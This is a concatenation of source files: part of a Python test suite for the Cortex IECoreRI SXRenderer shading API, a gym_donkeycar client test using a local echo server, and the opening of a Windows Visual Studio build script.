"mustBeTwo" : IECore.V3f( 2 ),
"mustBeThree" : IECore.V3f( 3 ),
"mustBeFour" : IECore.V3f( 4 ),
"mustBeHelloWorld" : "helloWorld",
"mustBeOneTwoThree" : IECore.V3f( 1, 2, 3 ),
} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 1 ) )
s = r.shade( self.__rectanglePoints( b ) )
self.assertEqual( s["Ci"][0], IECore.Color3f( 0, 1, 0 ) )
def testStack( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxStackTest.sdl test/IECoreRI/shaders/sxStackTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
with IECore.WorldBlock( r ) :
r.setAttribute( "color", IECore.Color3f( 1, 0, 0 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
r.shader( "surface", "test/IECoreRI/shaders/sxStackTest.sdl", { "blue" : 1.0 } )
with IECore.AttributeBlock( r ) :
r.setAttribute( "color", IECore.Color3f( 0, 1, 0 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) )
r.shader( "surface", "test/IECoreRI/shaders/sxStackTest.sdl", { "blue" : 0.5 } )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 0, 0.5 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
s = r.shade( points )
for c in s["Ci"] :
self.assertEqual( c, IECore.Color3f( 0, 0, 1 ) )
self.assertEqual( r.getAttribute( "color" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
self.assertEqual( r.getAttribute( "opacity" ), IECore.Color3fData( IECore.Color3f( 1 ) ) )
def testNoShader( self ) :
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
self.assertRaises( RuntimeError, r.shade, self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) ) ) )
def testCoshaders( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 0, 0 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 0, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0, 0, 1 ), "__handle" : "cs3" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1", "cs2", "cs3" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/coshaders.cob" ).read() )
def testCoshadersWithGetVar( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 4 ) )
points = self.__rectanglePoints( b )
points["forGetVar"] = IECore.Color3fVectorData( [ IECore.Color3f( x[0], x[1], x[2] ) for x in points["P"] ] )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "primVarName" : "forGetVar", "__handle" : "cs1" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], points["forGetVar"] )
def testGrids( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxGridTest.sdl test/IECoreRI/shaders/sxGridTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxGridTest", {} )
# not providing enough points for the grid should raise
self.assertRaises( RuntimeError, r.shade, points, IECore.V2i( 100, 500 ) )
s = r.shade( points )
del s["P"] # test data on disk was created before we supported P as an output
del s["N"] # test data on disk was created before we supported N as an output
self.assertEqual( s, IECore.ObjectReader( "test/IECoreRI/data/sxOutput/noGrid.cob" ).read() )
s = r.shade( points, IECore.V2i( 21, 11 ) )
del s["P"] # test data on disk was created before we supported P as an output
del s["N"] # test data on disk was created before we supported N as an output
self.assertEqual( s, IECore.ObjectReader( "test/IECoreRI/data/sxOutput/grid.cob" ).read() )
def testPlaneShade( self ) :
r = IECoreRI.SXRenderer()
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxStTest.sdl test/IECoreRI/shaders/sxStTest.sl" ), 0 )
r.shader( "surface", "test/IECoreRI/shaders/sxStTest.sdl", {} )
data = r.shadePlane( IECore.V2i( 64, 64 ) )
del data["P"]
del data["N"]
self.assertEqual( data, IECore.Reader.create( "test/IECoreRI/data/sxOutput/shadePlaneCompoundData.cob" ).read() )
image = r.shadePlaneToImage( IECore.V2i( 64, 64 ) )
expectedImage = IECore.Reader.create( "test/IECoreRI/data/sxOutput/shadePlaneImage.exr" ).read()
self.assertEqual( IECore.ImageDiffOp()( imageA=image, imageB=expectedImage, maxError=0 ), IECore.BoolData( False ) )
def testWrongType( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
p["t"] = p["P"]
self.assertRaises( RuntimeError, r.shade, p )
def testWrongSize( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
del p["t"][-10:]
self.assertRaises( RuntimeError, r.shade, p )
def testDisplacementShader( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxDisplacementTest.sdl test/IECoreRI/shaders/sxDisplacementTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "displacement", "test/IECoreRI/shaders/sxDisplacementTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
## need to use a grid topology if we want calculatenormal() to work
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( len( s ), 2 )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
for i in range( 0, len( points["P"] ) ) :
self.failUnless( s["P"][i].equalWithAbsError( points["P"][i] + points["N"][i], 0.001 ) )
self.failUnless( s["N"][i].equalWithAbsError( IECore.V3f( 0, 0, 1 ), 0.001 ) )
def testDisplacementAndSurfaceShaders( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxDisplacementTest.sdl test/IECoreRI/shaders/sxDisplacementTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "displacement", "test/IECoreRI/shaders/sxDisplacementTest.sdl", {} )
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
## need to use a grid topology if we want calculatenormal() to work
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( len( s ), 6 )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
for i in range( 0, len( points["P"] ) ) :
self.failUnless( s["P"][i].equalWithAbsError( points["P"][i] + points["N"][i], 0.001 ) )
self.failUnless( s["N"][i].equalWithAbsError( IECore.V3f( 0, 0, 1 ), 0.001 ) )
def testLights( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxLightTest.sdl test/IECoreRI/shaders/sxLightTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxIlluminanceTest.sdl test/IECoreRI/shaders/sxIlluminanceTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxIlluminanceTest", {} )
r.light( "test/IECoreRI/shaders/sxLightTest", "light0", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = s["Ci"][i]
self.assertEqual( points["P"][i], IECore.V3f( c[0], c[1], c[2] ) )
def testPredefinedPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 1, 1, 1 ) )
def testNonPredefinedPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fVectorData( [ IECore.Color3f( v[0], v[1], v[2] ) for v in points["P"] ] )
points["floatPrimVar"] = points["s"]
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = points["colorPrimVar"][i]
c[0] = points["s"][i]
self.assertEqual( s["Ci"][i], c )
def testNonPredefinedPrimitiveVariablesForCoshaders( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fVectorData( [ IECore.Color3f( v[0], v[1], v[2] ) for v in points["P"] ] )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "__handle" : "cs1" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1" ] ) } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
self.assertEqual( s["Ci"], points["colorPrimVar"] )
def testUniformPrimitiveVariables( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sdl test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxUniformPrimitiveVariableTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fData( IECore.Color3f( 0, 0.5, 1 ) )
points["floatPrimVar"] = IECore.FloatData( 16.0 )
points["vectorPrimVar"] = IECore.V3fData( IECore.V3f( 0.25, 0.5, 2 ) )
points["stringPrimVar"] = IECore.StringData( "hello shader!" )
points["stringVectorPrimVar"] = IECore.StringVectorData( ["who's", "a", "good", "boy" ] )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0.125, 0.25, 0.75 ) )
def testUniformPrimitiveVariableShaderParameters( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sdl test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["colorPrimVar"] = IECore.Color3fData( IECore.Color3f( 0, 0.5, 1 ) )
points["floatPrimVar"] = IECore.FloatData( 16.0 )
points["vectorPrimVar"] = IECore.V3fData( IECore.V3f( 0.25, 0.5, 2 ) )
points["stringPrimVar"] = IECore.StringData( "hello shader!" )
points["stringVectorPrimVar"] = IECore.StringVectorData( ["who's", "a", "good", "boy" ] )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0.125, 0.25, 0.5 ) )
def testThreading( self ) :
# set up a renderer with a shader in it
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxTest.sdl test/IECoreRI/shaders/sxTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxTest.sdl", { "noiseFrequency" : 1.0, "tint" : IECore.Color3f( 1 ) } )
# and get some points to shade
points = IECore.CompoundData( {
"N" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"Ng" : self.__loadImage( "test/IECoreRI/data/sxInput/cowN.exr" ),
"P" : self.__loadImage( "test/IECoreRI/data/sxInput/cowP.exr" ),
"I" : self.__loadImage( "test/IECoreRI/data/sxInput/cowI.exr" ),
} )
# shade in lots of different threads at the same time
def s( i ) :
results[i] = r.shade( points )
threads = []
results = []
for i in range( 0, 300 ) :
threads.append( threading.Thread( target = IECore.curry( s, i ) ) )
results.append( None )
for t in threads :
t.start()
for t in threads :
t.join()
# and check that it all worked
cowFloat = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowFloat.cob" ).read()
cowColor = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowColor.cob" ).read()
cowCI = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowCI.cob" ).read()
cowOI = IECore.ObjectReader( "test/IECoreRI/data/sxOutput/cowOI.cob" ).read()
# check that the first set of results is close enough to the expected results.
# we allow some small variation as 3delight's noise routines seem to yield
# veryvery small differences between some versions.
self.__assertVectorDataAlmostEqual( results[0]["outputFloat"], cowFloat )
self.__assertVectorDataAlmostEqual( results[0]["outputColor"], cowColor )
self.__assertVectorDataAlmostEqual( results[0]["Ci"], cowCI )
self.__assertVectorDataAlmostEqual( results[0]["Oi"], cowOI )
# check that all results are exactly equal to the first set. even if we
# accept small variations between different 3delight versions we don't accept
# variation within one version.
for s in results :
self.assertEqual( len( s ), 6 )
self.failUnless( "outputFloat" in s )
self.failUnless( "outputColor" in s )
self.failUnless( "Ci" in s )
self.failUnless( "Oi" in s )
self.failUnless( "P" in s )
self.failUnless( "N" in s )
self.assertEqual( s["outputFloat"], results[0]["outputFloat"] )
self.assertEqual( s["outputColor"], results[0]["outputColor"] )
self.assertEqual( s["Ci"], results[0]["Ci"] )
self.assertEqual( s["Oi"], results[0]["Oi"] )
def testGetVar( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxGetVarTest.sdl test/IECoreRI/shaders/sxGetVarTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
points["floatValue1"] = points["s"]
points["floatValue2"] = points["t"]
r.shader( "surface", "test/IECoreRI/shaders/sxGetVarTest", { } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( s["Ci"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0, points["floatValue1"][i], points["floatValue2"][i] ) )
def testGetShaderInConstruct( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxGetShaderTest.sdl test/IECoreRI/shaders/sxGetShaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "__handle" : "cs1", "sColor" : IECore.Color3f( 0, 1, 0 ), } )
r.shader( "surface", "test/IECoreRI/shaders/sxGetShaderTest", { "coshader" : IECore.StringData( "cs1" ) } )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
self.assertEqual( s["Ci"][i], IECore.Color3f( 0, points["s"][i], 0 ) )
def testCoshadersStack( self ) :
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTest.sdl test/IECoreRI/shaders/sxCoshaderTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -o test/IECoreRI/shaders/sxCoshaderTestMain.sdl test/IECoreRI/shaders/sxCoshaderTestMain.sl" ), 0 )
r = IECoreRI.SXRenderer()
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 100 ) )
points = self.__rectanglePoints( b )
with IECore.WorldBlock( r ) :
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 0, 0 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 0, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0, 0, 1 ), "__handle" : "cs3" } )
with IECore.AttributeBlock( r ) :
# these guys should be popped and therefore not affect the result
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "shaderColor" : IECore.Color3f( 1, 1, 1 ), "__handle" : "cs1" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "sColor" : IECore.Color3f( 1, 1, 0 ), "__handle" : "cs2" } )
r.shader( "shader", "test/IECoreRI/shaders/sxCoshaderTest", { "tColor" : IECore.Color3f( 0.5, 0, 0.25 ), "__handle" : "cs3" } )
r.shader( "surface", "test/IECoreRI/shaders/sxCoshaderTestMain", { "coshaders" : IECore.StringVectorData( [ "cs1", "cs2", "cs3" ] ) } )
s = r.shade( points )
self.assertEqual( s["Ci"], IECore.ObjectReader( "test/IECoreRI/data/sxOutput/coshaders.cob" ).read() )
def testLightsStack( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxLightTest.sdl test/IECoreRI/shaders/sxLightTest.sl" ), 0 )
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxIlluminanceTest.sdl test/IECoreRI/shaders/sxIlluminanceTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
with IECore.WorldBlock( r ) :
r.shader( "surface", "test/IECoreRI/shaders/sxIlluminanceTest", {} )
r.light( "test/IECoreRI/shaders/sxLightTest", "light0", {} )
with IECore.AttributeBlock( r ) :
# this guy should be popped and therefore not affect the result
r.light( "test/IECoreRI/shaders/sxLightTest", "light1", {} )
b = IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 20, 10 ) )
points = self.__rectanglePoints( b )
s = r.shade( points, IECore.V2i( 21, 11 ) )
for i in range( 0, len( points["P"] ) ) :
c = s["Ci"][i]
self.assertEqual( points["P"][i], IECore.V3f( c[0], c[1], c[2] ) )
def testZeroLength( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/splineTest.sdl test/IECoreRI/shaders/splineTest.sl" ), 0 )
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/splineTest.sdl", {} )
p = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 10 ) ) )
for k, v in p.items() :
del v[:]
self.assertRaises( RuntimeError, r.shade, p )
def testThreadedTextureLookups( self ) :
self.assertEqual( os.system( "shaderdl -Irsl -o test/IECoreRI/shaders/sxTextureTest.sdl test/IECoreRI/shaders/sxTextureTest.sl" ), 0 )
points = self.__rectanglePoints( IECore.Box2i( IECore.V2i( 0 ), IECore.V2i( 255 ) ) )
# by default you should be able to run as many threads as the hardware will support
# concurrently.
for i in range( 0, 10 ) :
r = IECoreRI.SXRenderer()
r.shader( "surface", "test/IECoreRI/shaders/sxTextureTest.sdl", {
"fileName" : os.path.realpath( "./test/IECoreRI/data/textures/uvMap.256x256.tdl" ),
} )
# note the -1 when determining the number of threads. 3delight behaviour changed around
# 10.0.35, such that render:nthreads (which defaults to hardwareConcurrency()) is the
# number of threads that will be making Sx calls of any sort, whereas prior to that it
# was the number of threads that would actually call SxCallShader. because we've set up
# the renderer on this thread, it's taken one off the count for the number of threads we
# can spawn to do the shading.
threads = []
for i in range( 0, IECore.hardwareConcurrency() - 1 ) :
threads.append( threading.Thread( target = IECore.curry( r.shade, points ) ) )
for t in threads :
t.start()
for t in threads :
t.join()
# but if you want to use more then you need to let the library know about it
# by calling setOption( "ri:render:nthreads" )
for i in range( 0, 10 ) :
r = IECoreRI.SXRenderer()
# see above - we're adding one to number of threads we'll be using to do the shading,
# because we've also used a thread (the current thread) to perform the setup.
r.setOption( "ri:render:nthreads", IECore.IntData( IECore.hardwareConcurrency() * 2 + 1 ) )
r.shader( "surface", "test/IECoreRI/shaders/sxTextureTest.sdl", {
"fileName" : os.path.realpath( "./test/IECoreRI/data/textures/uvMap.256x256.tdl" ),
} )
threads = []
for i in range( 0, IECore.hardwareConcurrency() * 2 ) :
threads.append( threading.Thread( target = IECore.curry( r.shade, points ) ) )
for t in threads :
t.start()
for t in threads :
t.join()
def tearDown( self ) :
files = [
"test/IECoreRI/shaders/sxTest.sdl",
"test/IECoreRI/shaders/splineTest.sdl",
"test/IECoreRI/shaders/sxParameterTest.sdl",
"test/IECoreRI/shaders/sxStackTest.sdl",
"test/IECoreRI/shaders/sxCoshaderTest.sdl",
"test/IECoreRI/shaders/sxCoshaderTestMain.sdl",
"test/IECoreRI/shaders/sxGridTest.sdl",
"test/IECoreRI/shaders/sxDisplacementTest.sdl",
"test/IECoreRI/shaders/sxIlluminanceTest.sdl",
"test/IECoreRI/shaders/sxLightTest.sdl",
"test/IECoreRI/shaders/sxStTest.sdl",
"test/IECoreRI/shaders/sxPredefinedPrimitiveVariableTest.sdl",
"test/IECoreRI/shaders/sxNonPredefinedPrimitiveVariableTest.sdl",
"test/IECoreRI/shaders/sxGetVarTest.sdl",
"test/IECoreRI/shaders/sxGetShaderTest.sdl",
"test/IECoreRI/shaders/sxTextureTest.sdl",
"test/IECoreRI/shaders/sxUniformPrimitiveVariableShaderParameterTest.sdl",
"test/IECoreRI/shaders/sxUniformPrimitiveVariableTest.sdl",
]
for f in files :
if os.path.exists( f ) :
os.remove( f )
if __name__ == "__main__":
unittest.main()
|
client.test.py
|
import unittest
import asyncore
import socket
import sys
import time
from gym_donkeycar.core.sim_client import SDClient
import logging
import sys
from threading import Thread
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
root.addHandler(handler)
host='localhost'
port=10000
class EchoHandler(asyncore.dispatcher_with_send):
def handle_read(self):
data = self.recv(8192)
if data:
root.info ('Server got %s' % data)
self.send(data)
class TestServer (asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(5)
self.processing_loop=True
self.handler=None
self.th = Thread(target=self.loop, args=())
self.th.start()
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
root.info ('Incoming connection from %s' % repr(addr))
self.handler = EchoHandler(sock)
def stop(self):
root.info ('Stoping Server')
self.processing_loop = False
self.th.join()
root.info ('Server stoped')
def loop(self):
while (self.processing_loop):
asyncore.loop(count=1)
time.sleep(0.01)
class SUT (SDClient):
def __init__(self, address, ):
super().__init__(*address, poll_socket_sleep_time=0.01)
self.receivedMsg=None
self.receivedCount=0
def on_msg_recv(self, json_packet):
root.info ('Got %s' % json_packet)
self.receivedMsg = json_packet
self.receivedCount+=1
def reInit(self):
self.receivedMsg = None
self.receivedCount = 0
class SDClientTest (unittest.TestCase):
@classmethod
def setUpClass(self):
self.server=TestServer(host, port)
time.sleep(1)
@classmethod
def tearDownClass(self):
self.server.stop()
def setUp(self):
self.SUT=SUT((host, port))
time.sleep(1)
self.SUT.reInit()
def tearDown(self):
self.SUT.stop()
def test_simpleMessage(self):
self.server.handler.send(b'{"msg_type":"test1"}\n')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==1)
def test_simpleMessageUndelimited(self):
self.server.handler.send(b'{"msg_type":"test2"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==1)
def test_SimpleConcat(self):
self.server.handler.send(b'{"msg_type":"test3"}\n{"msg_type":"test31"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==2)
def test_uncompletePayload(self):
self.server.handler.send(b'{"msg_type":"test4","tutu":')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount==0)
def test_fragmentedPayload1(self):
self.server.handler.send(b'{"msg_type":"test5"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test51"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload2(self):
self.server.handler.send(b'{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test6"}\n{"msg_type":"test61"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload3(self):
self.server.handler.send(b'{"msg_type":"test7"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test71"}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test72"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,3)
def test_fragmentedPayload4(self):
self.server.handler.send(b'{"msg_type":"test8"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test81"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
def test_fragmentedPayload5(self):
self.server.handler.send(b'{"msg_type":"test9"')
time.sleep(1)
self.server.handler.send(b'}\n{')
time.sleep(1)
self.server.handler.send(b'"msg_type":"test91"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount,2)
if __name__ == '__main__':
unittest.main()
|
build.py
|
import os, subprocess, threading;
gsWDExpressPath = r"C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\WDExpress.exe";
assert os.path.isfile(gsWDExpressPath), "Cannot find WDExpress.exe";
giErrorCount = 0;
def build(sFolderPath, sFileName, sPlatform, sConfig):
global giErrorCount;
oOutputLock.acquire();
print "Building %s (%s, %s)..." % (sFileName, sPlatform, sConfig);
oOutputLock.release();
sFilePath = os.path.join(sFolderPath, sFileName);
iTryCount = 1;
while iTryCount <= 2:
asCommandLine = [gsWDExpressPath, sFilePath, "/build"];
if sConfig:
asCommandLine.append(sPlatform and "%s|%s" % (sConfig, sPlatform) or sConfig);
oProcess = subprocess.Popen(asCommandLine, executable = gsWDExpressPath);
iReturnCode = oProcess.wait();
